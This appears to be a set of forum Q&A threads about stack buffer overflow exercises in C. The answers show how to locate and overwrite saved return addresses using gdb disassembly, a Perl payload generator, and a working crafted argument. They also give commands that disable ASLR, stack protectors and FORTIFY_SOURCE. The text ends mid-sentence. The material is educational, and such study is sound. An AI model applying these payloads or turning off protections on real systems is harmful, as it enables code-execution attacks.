I'm trying to find a way to exploit the buffer overflow vulnerability in the following source code so the line, printf("x is 1") will be skipped:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void func(char *str) {
char buffer[24];
int *ret;
strcpy(buffer,str);
}
int main(int argc, char **argv) {
int x;
x = 0;
func(argv[1]);
x = 1;
printf("x is 1");
printf("x is 0");
getchar();
}
In order to do this, I want to modify the "func" function. I know that I will need to use the ret variable in order to modify the return address to just past the line I want to skip, but I'm not sure how to actually do that. Does anyone have a suggestion?
EDIT:
By using gdb, I was able to find the following calls in the main function:
Temporary breakpoint 1, 0x00000000004005ec in main ()
(gdb) x/20i $pc
=> 0x4005ec <main+4>: sub $0x20,%rsp
0x4005f0 <main+8>: mov %edi,-0x14(%rbp)
0x4005f3 <main+11>: mov %rsi,-0x20(%rbp)
0x4005f7 <main+15>: movl $0x0,-0x4(%rbp)
0x4005fe <main+22>: mov -0x20(%rbp),%rax
0x400602 <main+26>: add $0x8,%rax
0x400606 <main+30>: mov (%rax),%rax
0x400609 <main+33>: mov %rax,%rdi
0x40060c <main+36>: callq 0x4005ac <func>
0x400611 <main+41>: movl $0x1,-0x4(%rbp)
0x400618 <main+48>: mov $0x4006ec,%edi
0x40061d <main+53>: mov $0x0,%eax
0x400622 <main+58>: callq 0x400470 <printf@plt>
0x400627 <main+63>: mov $0x4006f3,%edi
0x40062c <main+68>: mov $0x0,%eax
0x400631 <main+73>: callq 0x400470 <printf@plt>
0x400636 <main+78>: callq 0x400490 <getchar@plt>
0x40063b <main+83>: leaveq
0x40063c <main+84>: retq
0x40063d: nop
However, I'm not sure where to go from here. I know that the function will return to the instruction at 0x400611 and that I need to make it jump to 0x400631 instead, but I'm not sure how to determine how many bytes to jump or how I should modify the ret variable.
The idea is to find where the return address to the main function is on the stack and then add to this address the offset to the command you'd like to get.
To do that:
Use the disassembly to find the difference between the original return address and the new one:
Find the func frame address on the stack using a local variable (e.g. the function parameter):
Finally find the relative location of the return address on the stack comparing the address of the local variable:
Using the above your code would look something like:
void func(char *str) {
// 1. Get the address of an object on the stack
long *ret = (long*)(&str);
// 2. Move ret to point to the location of the return address from this function.
// Per the example above, on my system (64-bit Windows + VS) it was just -1.
ret -= NUMBER_OF_ITEMS_IN_THE_STACK_BEFORE_RETURN_ADDR;
// 3. Modify the return address by adding the offset of the instruction to
// jump to (33 in my case).
*ret = *ret + OFFSET_TO_COMMAND;
// The rest of your code
char buffer[24];
strcpy(buffer, str);
}
As noted above, the exact numbers are system dependent (i.e. OS, Compiler, etc.). However, using the techniques above you should be able to find the right numbers to set.
As a final note, modern compilers (e.g. VS) may insert security checks that protect against stack corruption. If your program crashes because of them, check your compiler options to see how they can be disabled.
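The first step above (finding the difference between the original and the new return address) is plain subtraction. Here is a minimal sketch using the addresses from the gdb listing in the question. The helper name return_address_delta is made up for illustration, and the target 0x400627 assumes you want to resume at the instruction that loads the argument for the second printf:

```c
#include <stdint.h>

/* Hypothetical helper: number of bytes to add to the saved return
 * address so that execution resumes at `target` instead of `original`. */
int64_t return_address_delta(uint64_t original, uint64_t target)
{
    return (int64_t)target - (int64_t)original;
}
```

For that listing, return_address_delta(0x400611, 0x400627) evaluates to 22 (0x16), which would be the value of OFFSET_TO_COMMAND on that particular build. A different compiler or flag set will give a different number.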
Why does this program need more than 45 bytes of input to cause a buffer overflow (segmentation fault)?
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[])
{
char whatever[20];
strcpy(whatever, argv[1]);
return 0;
}
I mean, I expected it to take only slightly more than 24 characters of input. By the way, grsecurity is not enabled on my system, and I'm using 32-bit Ubuntu 7.04 on VirtualBox.
Ok, what's interesting here is the disassembly of main:
push %ebp
mov %esp,%ebp
sub $0x38,%esp
and $0xfffffff0,%esp
mov $0x0,%eax
sub %eax,%esp
mov 0xc(%ebp),%eax
add $0x4,%eax
mov (%eax),%eax
mov %eax,0x4(%esp)
lea 0xffffffd8(%ebp),%eax
mov %eax,(%esp)
call 80482a0 <strcpy@plt>
mov $0x0,%eax
leave
ret
Before entering main, the stack pointer esp points to the return address pushed by call. Let's call that &ret.
The first opcode in the function pushes the base pointer of the previous frame, and then sets the current base pointer to the stack pointer. So ebp = &ret - 4.
When setting up the call to strcpy, the value right at esp is the first parameter. Here:
mov %eax,(%esp)
call 80482a0 <strcpy@plt>
So the value in eax is the first parameter. If we look at the previous instruction, we can see what that value is:
lea 0xffffffd8(%ebp),%eax
Ok, this notation basically means: eax = ebp + 0xffffffd8, which is equivalent to eax = ebp - 40 (see Two's Complement). Basically, you flip all the bits (and get 0x27=39), stick a minus sign (-39), and subtract 1 (-40).
And in relation to the frame's return address: eax = &ret - 44
So it would take at least 45 bytes to overrun the return address.
But you say 47. This is interesting, and it might have to do with the specific input you supplied.
You see, x86 is a little-endian machine, which means that in memory, integers are stored LSB-first. So, when overwriting the stored return address, you first overwrite its LSB.
If your input happens to be in the vicinity of the LSB, you might cause a faulty termination, but not a segmentation fault, as you will cause a branch to a legitimate address.
If you'll share your input, it might help shed some light on those two missing bytes :)
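The displacement arithmetic above can be sketched in C. The function names are made up for illustration, and the second helper assumes the 32-bit frame layout described in this answer (saved ebp at ebp+0, return address at ebp+4):

```c
#include <stdint.h>

/* Decode a 32-bit displacement as printed by the disassembler
 * (e.g. 0xffffffd8) into a signed value, following the
 * "flip the bits, negate, subtract 1" rule. */
int32_t decode_disp32(uint32_t raw)
{
    if (raw & 0x80000000u)
        return -(int32_t)(uint32_t)~raw - 1;
    return (int32_t)raw;
}

/* Bytes between the start of a buffer at ebp+disp and the saved
 * return address at ebp+4 (assumed frame layout, see above). */
int32_t bytes_before_return_address(int32_t disp)
{
    return 4 - disp;
}
```

With the value from the lea instruction, decode_disp32(0xffffffd8) is -40 and bytes_before_return_address(-40) is 44, so the 45th byte written is the first one that lands on the return address.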
I'm experimenting with buffer overflows and try to overwrite the return address of the stack with a certain input of fgets
This is the code:
void foo()
{
fprintf(stderr, "You did it.\n");
}
void bar()
{
char buf[20];
puts("Input:");
fgets(buf, 24, stdin);
printf("Your input:.\n", strlen(buf));
}
int main(int argc, char **argv)
{
bar();
return 0;
}
On a normal execution the program just returns your input. I want it to output foo() without modifying the code.
My idea was to overflow the buffer of buf by entering 20 'A's. This works and causes a segmentation fault.
My next idea was to find out the address of foo() which is \x4006cd and append this to the 20 'A's.
From my understanding this should overwrite the return address of the stack and make it jump to foo. But it only causes a segfault.
What am I doing wrong?
Update: Assembler dumps
main
Dump of assembler code for function main:
0x000000000040073b <+0>: push %rbp
0x000000000040073c <+1>: mov %rsp,%rbp
0x000000000040073f <+4>: sub $0x10,%rsp
0x0000000000400743 <+8>: mov %edi,-0x4(%rbp)
0x0000000000400746 <+11>: mov %rsi,-0x10(%rbp)
0x000000000040074a <+15>: mov $0x0,%eax
0x000000000040074f <+20>: callq 0x4006f1 <bar>
0x0000000000400754 <+25>: mov $0x0,%eax
0x0000000000400759 <+30>: leaveq
0x000000000040075a <+31>: retq
End of assembler dump.
foo
Dump of assembler code for function foo:
0x00000000004006cd <+0>: push %rbp
0x00000000004006ce <+1>: mov %rsp,%rbp
0x00000000004006d1 <+4>: mov 0x200990(%rip),%rax # 0x601068 <stderr@@GLIBC_2.2.5>
0x00000000004006d8 <+11>: mov %rax,%rcx
0x00000000004006db <+14>: mov $0x15,%edx
0x00000000004006e0 <+19>: mov $0x1,%esi
0x00000000004006e5 <+24>: mov $0x400804,%edi
0x00000000004006ea <+29>: callq 0x4005d0 <fwrite@plt>
0x00000000004006ef <+34>: pop %rbp
0x00000000004006f0 <+35>: retq
End of assembler dump.
bar:
Dump of assembler code for function bar:
0x00000000004006f1 <+0>: push %rbp
0x00000000004006f2 <+1>: mov %rsp,%rbp
0x00000000004006f5 <+4>: sub $0x20,%rsp
0x00000000004006f9 <+8>: mov $0x40081a,%edi
0x00000000004006fe <+13>: callq 0x400570 <puts@plt>
0x0000000000400703 <+18>: mov 0x200956(%rip),%rdx # 0x601060 <stdin@@GLIBC_2.2.5>
0x000000000040070a <+25>: lea -0x20(%rbp),%rax
0x000000000040070e <+29>: mov $0x18,%esi
0x0000000000400713 <+34>: mov %rax,%rdi
0x0000000000400716 <+37>: callq 0x4005b0 <fgets@plt>
0x000000000040071b <+42>: lea -0x20(%rbp),%rax
0x000000000040071f <+46>: mov %rax,%rdi
0x0000000000400722 <+49>: callq 0x400580 <strlen@plt>
0x0000000000400727 <+54>: mov %rax,%rsi
0x000000000040072a <+57>: mov $0x400821,%edi
0x000000000040072f <+62>: mov $0x0,%eax
0x0000000000400734 <+67>: callq 0x400590 <printf@plt>
0x0000000000400739 <+72>: leaveq
0x000000000040073a <+73>: retq
End of assembler dump.
You did not account for memory alignment. I changed the code a little bit to make it easier to find the right spot.
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int **x;
int z;
void foo()
{
fprintf(stderr, "You did it.\n");
}
void bar()
{
char buf[2];
//puts("Input:");
//fgets(buf, 70, stdin);
x = (int**) buf;
for(z=0;z<8;z++)
printf("%d X=%x\n", z, *(x+z));
*(x+3) = foo;
printf("Your input: %d %s\n", strlen(buf), buf);
}
int main(int argc, char **argv)
{
printf("Foo: %x\n", foo);
printf("Main: %x\n", main);
bar();
return 0;
}
With a smaller buffer, 2 in my example, I found the return address 24 bytes away (x+3, for 8 byte pointers; 64 bits, no debug, no optimization...) from the beginning of the buffer. This position can change depending on the buffer size, architecture, etc. In this example, I manage to change the return address of bar to foo. Anyway you will get a segmentation fault at foo return, as it was not properly set to return to main.
I added x and z as global vars to not change the stack size of bar. The code will display an array of pointer like values, starting at buf[0]. In my case, I found the address in main in the position 3. That's why the final code has *(x+3) = foo. As I said, this position can change depending on compilation options, machine etc. To find the correct position, find the address of main (printed before calling bar) on the address list.
It is important to note that I said address in main, not the address of main, because the return address was set to the instruction after the call to bar and not to the beginning of main. So, in my case, it was 0x4006af instead of 0x400668.
In your example, with 20 bytes buffer, as far as I know, it was aligned to 32 bytes (0x20).
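The effect of that alignment can be checked against the bar disassembly in the question. The sketch below assumes an x86-64 frame with a frame pointer, where the saved %rbp sits at 0(%rbp) and the return address at 8(%rbp). The function names are made up for illustration:

```c
#include <stddef.h>

/* buf_below_rbp is how far below %rbp the buffer starts
 * (0x20 for "lea -0x20(%rbp),%rax"). The return address is assumed
 * to sit 8 bytes above %rbp, after the saved frame pointer. */
size_t distance_to_return_address(size_t buf_below_rbp)
{
    return buf_below_rbp + 8;
}

/* Returns 1 if a write of max_written bytes starting at the buffer
 * touches at least one byte of the return address, else 0. */
int write_reaches_return_address(size_t buf_below_rbp, size_t max_written)
{
    return max_written > distance_to_return_address(buf_below_rbp);
}
```

For the question's dump the distance is 0x20 + 8 = 40 bytes, while fgets(buf, 24, stdin) writes at most 24 bytes, so under these assumptions write_reaches_return_address(0x20, 24) is 0: the call as written stops short of the return address.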
If you want to do the same with fgets, you have to figure out how to type the address of foo, and if you are running on an x86/x64 machine, remember to enter it in little-endian order. You can change the code to display the values byte by byte, so you can get them in the right order and type them using ALT+number. Remember that the numbers you type while holding ALT are decimal numbers. Some terminals do not handle 0x00 well.
My output looks like:
$ gcc test.c -o test
test.c: In function ‘bar’:
test.c:21: warning: assignment from incompatible pointer type
$ ./test
Foo: 400594
Main: 400668
0 X=9560e9f0
1 X=95821188
2 X=889350f0
3 X=4006af
4 X=889351d8
5 X=0
6 X=0
7 X=95a1ed1d
Your input: 5 ▒▒`▒9
You did it.
Segmentation fault
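The little-endian byte order mentioned above can be sketched as follows. The helper name address_to_le_bytes is made up for illustration. It only computes the byte sequence and does not touch the stack:

```c
#include <stdint.h>
#include <stddef.h>

/* Store a 64-bit address into out[0..7], least significant byte first,
 * which is the order in which x86/x64 keeps it in memory. */
void address_to_le_bytes(uint64_t addr, unsigned char out[8])
{
    for (size_t i = 0; i < 8; i++)
        out[i] = (unsigned char)((addr >> (8 * i)) & 0xffu);
}
```

For the address of foo printed in the output above (0x400594), this yields the bytes 94 05 40 00 00 00 00 00, which is the order in which they would have to be fed to fgets.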
void bar()
{
char buf[20];
puts("Input:");
fgets(buf, 24, stdin);
printf("Your input:.\n", strlen(buf));
}
... This works and causes a segmentation fault...
The compiler is probably replacing fgets with a safer variant that includes a check on the destination buffer size. If the check fails, the program unconditionally calls abort().
In this particular case, you should compile the program with -U_FORTIFY_SOURCE or -D_FORTIFY_SOURCE=0.
I am trying to reproduce the stack overflow results that I read about in Aleph One's article "Smashing the Stack for Fun and Profit" (available at http://insecure.org/stf/smashstack.html).
Trying to overwrite the return address doesn't seem to work for me.
C code:
void function(int a, int b, int c) {
char buffer1[5];
char buffer2[10];
int *ret;
//Trying to overwrite return address
ret = buffer1 + 12;
(*ret) = 0x4005da;
}
void main() {
int x;
x = 0;
function(1,2,3);
x = 1;
printf("%d\n",x);
}
disassembled main:
(gdb) disassemble main
Dump of assembler code for function main:
0x00000000004005b0 <+0>: push %rbp
0x00000000004005b1 <+1>: mov %rsp,%rbp
0x00000000004005b4 <+4>: sub $0x10,%rsp
0x00000000004005b8 <+8>: movl $0x0,-0x4(%rbp)
0x00000000004005bf <+15>: mov $0x3,%edx
0x00000000004005c4 <+20>: mov $0x2,%esi
0x00000000004005c9 <+25>: mov $0x1,%edi
0x00000000004005ce <+30>: callq 0x400564 <function>
0x00000000004005d3 <+35>: movl $0x1,-0x4(%rbp)
0x00000000004005da <+42>: mov -0x4(%rbp),%eax
0x00000000004005dd <+45>: mov %eax,%esi
0x00000000004005df <+47>: mov $0x4006dc,%edi
0x00000000004005e4 <+52>: mov $0x0,%eax
0x00000000004005e9 <+57>: callq 0x400450 <printf@plt>
0x00000000004005ee <+62>: leaveq
0x00000000004005ef <+63>: retq
End of assembler dump.
I have hard coded the return address to skip the x=1; code line, I have used a hard coded value from the disassembler(address : 0x4005da). The intent of this exploit is to print 0, but instead it is printing 1.
I have a very strong feeling that "ret = buffer1 + 12;" does not point to the return address. If that is the case, how can I determine where the return address is? Is gcc allocating more memory between the return address and the buffer?
Here's a guide I wrote for a friend a while back on performing a buffer overflow attack using gets. It goes over how to get the return address and how to use it to write over the old one:
Our knowledge of the stack tells us that the return address appears on the stack after the buffer you're trying to overflow. However, how far after the buffer the return address appears depends on the architecture you're using. In order to determine this, first write a simple program and inspect the assembly:
C code:
void function()
{
char buffer[4];
}
int main()
{
function();
}
Assembly (abridged):
function:
pushl %ebp
movl %esp, %ebp
subl $16, %esp
leave
ret
main:
leal 4(%esp), %ecx
andl $-16, %esp
pushl -4(%ecx)
pushl %ebp
movl %esp, %ebp
pushl %ecx
call function
...
There are several tools that you can use to inspect the assembly code. First, of course, is compiling straight to assembly output from gcc using gcc -S main.c. This can be difficult to read since there are few or no hints as to which code corresponds to the original C code. Additionally, there is a lot of boilerplate code that can be difficult to sift through. Another tool to consider is gdbtui. The benefit of using gdbtui is that you can inspect the assembly source while running the program and manually inspect the stack throughout the execution of the program. However, it has a steep learning curve.
The assembly inspection program that I like best is objdump. Running objdump -dS a.out gives the assembly source with the context from the original C source code. Using objdump, on my computer the offset of the return address from the character buffer is 8 bytes.
The function below takes the return address and adds 7 to it. The instruction that the return address originally pointed to is 7 bytes long, so adding 7 makes the return address point to the instruction immediately after the assignment.
In the example below, I overwrite the return address to skip the instruction x = 1.
simple C program:
void function()
{
char buffer[4];
/* return address is 8 bytes beyond the start of the buffer */
int *ret = (int *)(buffer + 8);
/* assignment instruction we want to skip is 7 bytes long */
(*ret) += 7;
}
int main()
{
int x = 0;
function();
x = 1;
printf("%d\n",x);
}
Main function (x = 1 at 80483af is seven bytes long):
8048392: 8d4c2404 lea 0x4(%esp),%ecx
8048396: 83e4f0 and $0xfffffff0,%esp
8048399: ff71fc pushl -0x4(%ecx)
804839c: 55 push %ebp
804839d: 89e5 mov %esp,%ebp
804839f: 51 push %ecx
80483a0: 83ec24 sub $0x24,%esp
80483a3: c745f800000000 movl $0x0,-0x8(%ebp)
80483aa: e8c5ffffff call 8048374 <function>
80483af: c745f801000000 movl $0x1,-0x8(%ebp)
80483b6: 8b45f8 mov -0x8(%ebp),%eax
80483b9: 89442404 mov %eax,0x4(%esp)
80483bd: c70424a0840408 movl $0x80484a0,(%esp)
80483c4: e80fffffff call 80482d8 <printf@plt>
80483c9: 83c424 add $0x24,%esp
80483cc: 59 pop %ecx
80483cd: 5d pop %ebp
We know where the return address is, and we have demonstrated that changing it can affect the code that is run. A buffer overflow can do the same thing by using gets and inputting the right character string so that the return address is overwritten with a new address.
In a new example below we have a function function which has a buffer filled using gets. We also have a function uncalled which never gets called. With the correct input, we can run uncalled.
#include <stdio.h>
#include <stdlib.h>
void uncalled()
{
puts("uh oh!");
exit(1);
}
void function()
{
char buffer[4];
gets(buffer);
}
int main()
{
function();
puts("program secure");
}
To run uncalled, inspect the executable using objdump or similar to find the address of the entry point of uncalled. Then append the address to the input buffer in the right place so that it overwrites the old return address. If your computer is little-endian (x86, etc.), you need to swap the endianness of the address.
In order to do this correctly, I have a simple perl script below, which generates the input that will cause the buffer overflow that will overwrite the return address. It takes two arguments, first it takes the new return address, and second it takes the distance (in bytes) from the beginning of the buffer to the return address location.
#!/usr/bin/perl
print "x"x$ARGV[1]; # fill the buffer
print scalar reverse pack "H*", substr("0"x8 . $ARGV[0] , -8); # swap endian of input
print "\n"; # new line to end gets
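For readers who prefer C, here is a rough counterpart of the script above. It is only a sketch: the name build_overflow_input and its parameters are made up for illustration, and it assumes a 32-bit little-endian target like the one in this guide.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical C counterpart of the Perl script: writes `distance`
 * filler bytes, then the 32-bit address least significant byte first,
 * then '\n' to end the gets call. Returns the number of bytes written,
 * or 0 if `cap` is too small. */
size_t build_overflow_input(unsigned char *out, size_t cap,
                            uint32_t new_ret, size_t distance)
{
    size_t total = distance + 4 + 1;
    if (total < distance || total > cap)
        return 0;
    memset(out, 'x', distance);
    for (size_t i = 0; i < 4; i++)
        out[distance + i] = (unsigned char)((new_ret >> (8 * i)) & 0xffu);
    out[distance + 4] = '\n';
    return total;
}
```

A caller would typically pass the result to fwrite on stdout and pipe that into the vulnerable program. The address is taken as a number rather than a hex string, which avoids the padding step the Perl version needs.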
You need to examine the stack to determine if buffer1+12 is actually the right address to be modifying. This sort of stuff isn't exactly very portable.
I'd probably also place some eye catchers in the code so you can see where the buffers are on the stack in relation to the return address:
char buffer1[5] = "1111";
char buffer2[10] = "2222";
You can figure this out by printing out the stack. Add code like this:
int* pESP;
__asm mov pESP, esp
The __asm directive is Visual Studio specific. Once you have the address of the stack you can print it out and see what is in there. Note that the stack will change when you do things or make calls, so you have to save the whole block of memory at once by first copying the memory at the stack address to an array, then you print out the array.
What you will find is all kinds of garbage having to do with the stack frame and various runtime checks. By default VS will put guard code in the stack to prevent exactly what you are trying to do. If you print out the assembly listing for "function" you will see this. You need to set the compiler switches that turn all of this off.
As an alternative to the methods suggested in other answers, you can figure this sort of thing out using gdb. To make the output a bit easier to read, I removed the buffer2 variable and changed buffer1 to 8 bytes so things are more aligned. We will also compile in 32-bit mode to make it easier to read the addresses, and turn debugging on (gcc -m32 -g).
void function(int a, int b, int c) {
char buffer1[8];
char *ret;
so let's print the address of buffer1:
(gdb) print &buffer1
$1 = (char (*)[8]) 0xbffffa40
then let's print a bit past that and see what's on the stack.
(gdb) x/16x 0xbffffa40
0xbffffa40: 0x00001000 0x00000000 0xfecf25c3 0x00000003
0xbffffa50: 0x00000000 0xbffffb50 0xbffffa88 0x00001f3b
0xbffffa60: 0x00000001 0x00000002 0x00000003 0x00000000
0xbffffa70: 0x00000003 0x00000002 0x00000001 0x00001efc
Do a backtrace to see where the return address should be pointing:
(gdb) bt
#0 function (a=1, b=2, c=3) at foo.c:18
#1 0x00001f3b in main () at foo.c:26
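and sure enough, there it is in the dump: 0x00001f3b is the last word on the 0xbffffa50 line, which puts it at 0xbffffa5c. Reading from one byte lower, at 0xbffffa5b, shows the same bytes shifted by one position: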
(gdb) x/x 0xbffffa5b
0xbffffa5b: 0x001f3bbf
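Locating the return address in such a dump can also be done mechanically. The sketch below searches an array of 32-bit words (as printed by x/16x) for the value reported by bt. The name find_word is made up for illustration:

```c
#include <stdint.h>
#include <stddef.h>

/* Returns the index of the first word equal to `value`,
 * or -1 if it does not occur in the dump. */
ptrdiff_t find_word(const uint32_t *words, size_t count, uint32_t value)
{
    for (size_t i = 0; i < count; i++)
        if (words[i] == value)
            return (ptrdiff_t)i;
    return -1;
}
```

Applied to the words shown above, starting at 0xbffffa40, the value 0x00001f3b is found at index 7. That is 28 bytes past the start of buffer1, so the word itself begins at 0xbffffa40 + 28 = 0xbffffa5c.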
I am trying to make the buffer exploitation example (example3.c from http://insecure.org/stf/smashstack.html) work on Debian Lenny 2.6 version. I know the gcc version and the OS version is different than the one used by Aleph One. I have disabled any stack protection mechanisms using -fno-stack-protector and sysctl -w kernel.randomize_va_space=0 arguments. To account for the differences in my setup and Aleph One's I introduced two parameters : offset1 -> Offset from buffer1 variable to the return address and offset2 -> how many bytes to jump to skip a statement. I tried to figure out these parameters by analyzing assembly code but was not successful. So, I wrote a shell script that basically runs the buffer overflow program with simultaneous values of offset1 and offset2 from (1-60). But much to my surprise I am still not able to break this program. It would be great if someone can guide me for the same. I have attached the code and assembly output for consideration. Sorry for the really long post :)
Thanks.
// Modified example3.c from Aleph One paper - Smashing the stack
void function(int a, int b, int c, int offset1, int offset2) {
char buffer1[5];
char buffer2[10];
int *ret;
ret = (int *)buffer1 + offset1;// how far is return address from buffer ?
(*ret) += offset2; // modify the value of return address
}
int main(int argc, char* argv[]) {
int x;
x = 0;
int offset1 = atoi(argv[1]);
int offset2 = atoi(argv[2]);
function(1,2,3, offset1, offset2);
x = 1; // Goal is to skip this statement using buffer overflow
printf("X : %d\n",x);
return 0;
}
-----------------
// Execute the buffer overflow program with varying offsets
#!/bin/bash
for ((i=1; i<=60; i++))
do
for ((j=1; j<=60; j++))
do
echo "`./test $i $j`"
done
done
-- Assembler output
(gdb) disassemble main
Dump of assembler code for function main:
0x080483c2 <main+0>: lea 0x4(%esp),%ecx
0x080483c6 <main+4>: and $0xfffffff0,%esp
0x080483c9 <main+7>: pushl -0x4(%ecx)
0x080483cc <main+10>: push %ebp
0x080483cd <main+11>: mov %esp,%ebp
0x080483cf <main+13>: push %ecx
0x080483d0 <main+14>: sub $0x24,%esp
0x080483d3 <main+17>: movl $0x0,-0x8(%ebp)
0x080483da <main+24>: movl $0x3,0x8(%esp)
0x080483e2 <main+32>: movl $0x2,0x4(%esp)
0x080483ea <main+40>: movl $0x1,(%esp)
0x080483f1 <main+47>: call 0x80483a4 <function>
0x080483f6 <main+52>: movl $0x1,-0x8(%ebp)
0x080483fd <main+59>: mov -0x8(%ebp),%eax
0x08048400 <main+62>: mov %eax,0x4(%esp)
0x08048404 <main+66>: movl $0x80484e0,(%esp)
0x0804840b <main+73>: call 0x80482d8 <printf@plt>
0x08048410 <main+78>: mov $0x0,%eax
0x08048415 <main+83>: add $0x24,%esp
0x08048418 <main+86>: pop %ecx
0x08048419 <main+87>: pop %ebp
0x0804841a <main+88>: lea -0x4(%ecx),%esp
0x0804841d <main+91>: ret
End of assembler dump.
(gdb) disassemble function
Dump of assembler code for function function:
0x080483a4 <function+0>: push %ebp
0x080483a5 <function+1>: mov %esp,%ebp
0x080483a7 <function+3>: sub $0x20,%esp
0x080483aa <function+6>: lea -0x9(%ebp),%eax
0x080483ad <function+9>: add $0x30,%eax
0x080483b0 <function+12>: mov %eax,-0x4(%ebp)
0x080483b3 <function+15>: mov -0x4(%ebp),%eax
0x080483b6 <function+18>: mov (%eax),%eax
0x080483b8 <function+20>: lea 0x7(%eax),%edx
0x080483bb <function+23>: mov -0x4(%ebp),%eax
0x080483be <function+26>: mov %edx,(%eax)
0x080483c0 <function+28>: leave
0x080483c1 <function+29>: ret
End of assembler dump.
The disassembly for function you provided seems to use hardcoded values of offset1 and offset2, contrary to your C code.
The address for ret should be calculated using byte/char offsets: ret = (int *)(buffer1 + offset1), otherwise you'll get hit by pointer math (especially in this case, when your buffer1 is not at a nice aligned offset from the return address).
offset1 should be equal to 0x9 + 0x4 (the offset used in lea + 4 bytes for the push %ebp). However, this can change unpredictably each time you compile - the stack layout might be different, the compiler might create some additional stack alignment, etc.
offset2 should be equal to 7 (the length of the instruction you're trying to skip).
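The pointer-math point can be seen without touching a real return address. The sketch below only measures how far each form of the expression moves. The function names and the storage array are made up for illustration:

```c
#include <stddef.h>

/* Backing storage declared as int so that int-pointer arithmetic on it
 * is well defined. The sketch only measures distances, it never writes. */
static int storage[64];

/* Bytes advanced by the question's form: (int *)buffer1 + n */
ptrdiff_t bytes_advanced_int_math(size_t n)
{
    char *base = (char *)storage;
    return (char *)((int *)base + n) - base;
}

/* Bytes advanced by the suggested form: (int *)(buffer1 + n),
 * where the addition happens on a char pointer. */
ptrdiff_t bytes_advanced_char_math(size_t n)
{
    char *base = (char *)storage;
    return (base + n) - base;
}
```

For n = 13 (0x9 + 0x4), the first form moves 13 * sizeof(int) bytes, which is 52 with a 4-byte int, while the second moves exactly 13. That is why a loop over offset1 in the original program can step over the return address without ever landing on it.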
Note that you're getting a little lucky here - the function uses the cdecl calling convention, which means the caller is responsible for removing arguments off the stack after returning from the function, which normally looks like this:
push arg3
push arg2
push arg1
call func
add esp, 0Ch ; remove as many bytes as were used by the pushed arguments
Your compiler chose to combine this correction with the one after printf, but it could also decide to do this after your function call. In this case the add esp, <number> instruction would be present between your return address and the instruction you want to skip - you can probably imagine that this would not end well.
I just wrote a C Code which is below :
#include<stdio.h>
#include<string.h>
void func(char *str)
{
char buffer[24];
int *ret;
strcpy(buffer,str);
}
int main(int argc,char **argv)
{
int x;
x=0;
func(argv[1]);
x=1;
printf("\nx is 1\n");
printf("\nx is 0\n\n");
}
Can you please suggest how to skip the line printf("\nx is 1\n");? The clue I was given earlier was to modify the ret variable, which is supposed to be the return address of the function func.
Can you suggest how to change the return address in the above program so that printf("\nx is 1\n"); is skipped?
I have posted this question because I don't know how to change the return address.
It would be great if you help me out.
Thanks
From what I understand, you want the code to execute the instruction x=1; and then jump over the next printf so that it only prints x is 0. There's no way to do that.
However, what can be done is to make func() overwrite its own return address so that the code jumps straight to printf("\nx is 0\n\n");. This means jumping over x=1; too.
This is only possible because you pass func() whatever comes in on the command line and copy it directly into a fixed-size buffer. If the string you are copying is bigger than the allocated buffer, you'll probably end up corrupting the stack and potentially overwriting the function's return address.
There are great books like this one on the subject, and I recommend you to read them.
Loading your application on gdb and disassembling the main function, you'll see something similar to this:
(gdb) disas main
Dump of assembler code for function main:
0x0804840e <main+0>: lea 0x4(%esp),%ecx
0x08048412 <main+4>: and $0xfffffff0,%esp
0x08048415 <main+7>: pushl -0x4(%ecx)
0x08048418 <main+10>: push %ebp
0x08048419 <main+11>: mov %esp,%ebp
0x0804841b <main+13>: push %ecx
0x0804841c <main+14>: sub $0x24,%esp
0x0804841f <main+17>: movl $0x0,-0x8(%ebp)
0x08048426 <main+24>: mov 0x4(%ecx),%eax
0x08048429 <main+27>: add $0x4,%eax
0x0804842c <main+30>: mov (%eax),%eax
0x0804842e <main+32>: mov %eax,(%esp)
0x08048431 <main+35>: call 0x80483f4 <func> // obvious call to func
0x08048436 <main+40>: movl $0x1,-0x8(%ebp) // x = 1;
0x0804843d <main+47>: movl $0x8048520,(%esp) // pushing "x is 1" to the stack
0x08048444 <main+54>: call 0x804832c <puts@plt> // 1st printf call
0x08048449 <main+59>: movl $0x8048528,(%esp) // pushing "x is 0" to the stack
0x08048450 <main+66>: call 0x804832c <puts@plt> // 2nd printf call
0x08048455 <main+71>: add $0x24,%esp
0x08048458 <main+74>: pop %ecx
0x08048459 <main+75>: pop %ebp
0x0804845a <main+76>: lea -0x4(%ecx),%esp
0x0804845d <main+79>: ret
End of assembler dump.
It's important that you notice that the preparation for the 2nd printf call starts at address 0x08048449. In order to override the original return address of func() and make it jump to 0x08048449, you'll have to write beyond the capacity of char buffer[24];. On this test I used char buffer[6]; for simplicity purposes.
While in gdb, if I execute:
run `perl -e 'print "123456AAAAAAAA"x1,"\x49\x84\x04\x08"'`
this will successfully override the buffer and replace the address of return with the address I want it to jump to:
Starting program: /home/karl/workspace/stack/fun `perl -e 'print "123456AAAAAAAA"x1,"\x49\x84\x04\x08"'`
x is 0
Program exited with code 011.
(gdb)
I will not explain every step of the way because others have done it so much better already, but if you want to reproduce this behavior directly from the cmd-line, you could execute the following:
./fun `perl -e 'print "123456AAAAAAAA"x1,"\x49\x84\x04\x08"'`
Keep in mind that the memory addresses that gdb reports to you will probably be different than the ones I got.
Note: for this technique to work you may have to disable a kernel protection (address space layout randomization) first, but only if the command below reports anything other than 0:
cat /proc/sys/kernel/randomize_va_space
to disable it you'll need superuser access:
echo 0 > /proc/sys/kernel/randomize_va_space
The return address from func is on the stack, right near its local variables (one of them is buffer). If you want to overwrite the return address, you have to write past the end of the array (possibly to buffer[24...27], but I may be mistaken: it could be buffer[28...31], or even buffer[24...31] on a 64-bit system). I suggest using a debugger to find out the exact addresses.
BTW get rid of the ret variable - you accomplish nothing by having it around, and it might confuse your calculations.
Note that this "buffer overrun exploit" is a bit hard to debug because strcpy stops copying stuff when it encounters a zero byte, and the address you want to write to the stack probably contains such a byte. It will be easier to do it like this:
void func(char *str)
{
char buffer[24];
sscanf(str, "%x", &buffer[24]); // replace the 24 by 28, 32 or whatever is right
}
And give the address on the command-line as a hexadecimal string. This makes it a bit more clear what you're trying to do, and easier to debug.
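Whether the zero-byte problem applies to a given address can be checked up front. The sketch below counts how many bytes of a little-endian 32-bit address strcpy would copy before stopping. The name bytes_copied_before_nul is made up for illustration:

```c
#include <stdint.h>
#include <stddef.h>

/* Number of bytes of a little-endian 32-bit address that strcpy would
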